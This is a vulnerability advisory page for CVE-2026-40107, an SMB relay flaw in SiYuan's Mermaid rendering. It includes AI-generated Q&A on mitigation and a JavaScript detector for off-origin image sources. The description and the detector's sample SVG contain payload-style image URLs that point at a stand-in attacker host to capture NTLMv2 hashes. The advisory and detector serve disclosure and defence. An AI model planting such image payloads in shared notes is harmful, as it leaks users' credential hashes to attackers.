CVE-2026-40107
SMB Relay via SVG Injection in SiYuan Before

Publication date: 2026-04-09

Last updated on: 2026-04-16

Assigner: GitHub, Inc.

Description
SiYuan is a personal knowledge management system. Prior to 3.6.4, SiYuan configures Mermaid.js with securityLevel: "loose" and htmlLabels: true. In this mode, <img> tags with src attributes survive Mermaid's internal DOMPurify and land in SVG <foreignObject> blocks. The SVG is injected via innerHTML with no secondary sanitization. When a victim opens a note containing a malicious Mermaid diagram, the Electron client fetches the URL. On Windows, a protocol-relative URL (//attacker.com/image.png) resolves as a UNC path (\\attacker.com\image.png). Windows attempts SMB authentication automatically, sending the victim's NTLMv2 hash to the attacker. This vulnerability is fixed in 3.6.4.
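As an added illustration (not code from SiYuan or Mermaid), the check below scans Mermaid's rendered SVG for <img> sources inside <foreignObject> blocks that would resolve to a foreign host, which is the pattern the description names; the app origin, the host names and the sample SVG are assumptions constructed for the example.

```javascript
// Added example (not SiYuan or Mermaid code): scan a rendered Mermaid SVG
// string for <img src> values inside <foreignObject> that would fetch from a
// foreign host. The WHATWG URL parser (Node's global URL) resolves both the
// protocol-relative "//host/x" form and the backslash "\\host\x" form named
// in the advisory to that host. The regex extraction is a review heuristic,
// not a substitute for a real HTML sanitizer on the rendered output.

const APP_ORIGIN = "https://siyuan.local"; // hypothetical app origin (assumption)

// Inner HTML of each <foreignObject>...</foreignObject> block.
const FOREIGN_OBJECT_RE = /<foreignObject\b[^>]*>([\s\S]*?)<\/foreignObject>/gi;
// src attribute of each <img> tag, double- or single-quoted.
const IMG_SRC_RE = /<img\b[^>]*?\ssrc\s*=\s*(?:"([^"]*)"|'([^']*)')/gi;

function findOffOriginImages(svg, origin = APP_ORIGIN) {
  const appOrigin = new URL(origin).origin;
  const findings = [];
  for (const fo of svg.matchAll(FOREIGN_OBJECT_RE)) {
    for (const m of fo[1].matchAll(IMG_SRC_RE)) {
      const src = (m[1] ?? m[2]).trim();
      let resolved;
      try {
        resolved = new URL(src, origin);
      } catch {
        findings.push({ src, host: null, reason: "unparseable src" });
        continue;
      }
      if (resolved.origin !== appOrigin) {
        findings.push({ src, host: resolved.host, reason: "resolves off-origin" });
      }
    }
  }
  return findings;
}

// Constructed sample resembling Mermaid htmlLabels output; hosts are placeholders.
const SAMPLE_SVG = `<svg xmlns="http://www.w3.org/2000/svg">
  <g class="node"><foreignObject width="120" height="40">
    <div><img src="//attacker.example/image.png"> label</div>
  </foreignObject></g>
  <g class="node"><foreignObject width="120" height="40">
    <div><img src='\\\\attacker.example\\image.png'> label</div>
  </foreignObject></g>
  <g class="node"><foreignObject width="120" height="40">
    <div><img src="./assets/logo.png"> same-origin, not reported</div>
  </foreignObject></g>
</svg>`;

console.log(findOffOriginImages(SAMPLE_SVG)); // two findings, host "attacker.example"
```

The relative src resolves to the app origin and is not reported, while both foreign-host forms are.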
Meta Information
Published: 2026-04-09
Last Modified: 2026-04-16
Generated: 2026-05-07
AI Q&A: 2026-04-10
EPSS Evaluated: 2026-05-05
Affected Vendors & Products (1 associated CPE)
Vendor: b3log; Product: siyuan; Version / Range: up to 3.6.4 (excluding)
CWE-918: The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.
AI Powered Q&A
What immediate steps should I take to mitigate this vulnerability?

The vulnerability is fixed in SiYuan version 3.6.4. Therefore, the immediate step to mitigate this vulnerability is to upgrade the SiYuan personal knowledge management system to version 3.6.4 or later.


Can you explain this vulnerability to me?

This vulnerability exists in SiYuan, a personal knowledge management system, prior to version 3.6.4. SiYuan configures Mermaid.js with securityLevel set to "loose" and htmlLabels enabled. In this configuration, <img> tags with src attributes are not properly sanitized and end up inside SVG <foreignObject> blocks. The SVG content is then injected into the application using innerHTML without any additional sanitization.

When a user opens a note containing a malicious Mermaid diagram, the Electron client fetches the image URL. On Windows systems, if the URL is protocol-relative (e.g., //attacker.com/image.png), it is interpreted as a UNC path (\\attacker.com\image.png). Windows then attempts to authenticate to this SMB path automatically, sending the victim's NTLMv2 hash to the attacker.

This behavior can lead to credential leakage to an attacker-controlled server. The vulnerability was fixed in SiYuan version 3.6.4.


How can this vulnerability impact me?

This vulnerability can lead to the leakage of NTLMv2 hashes from a victim's Windows machine to an attacker. Specifically, when a user opens a malicious note containing a crafted Mermaid diagram, their system may automatically send authentication hashes to an attacker-controlled SMB server.

An attacker who obtains these hashes could attempt to use them to authenticate or perform further attacks on the victim's network or systems, potentially leading to unauthorized access or lateral movement within an organization.

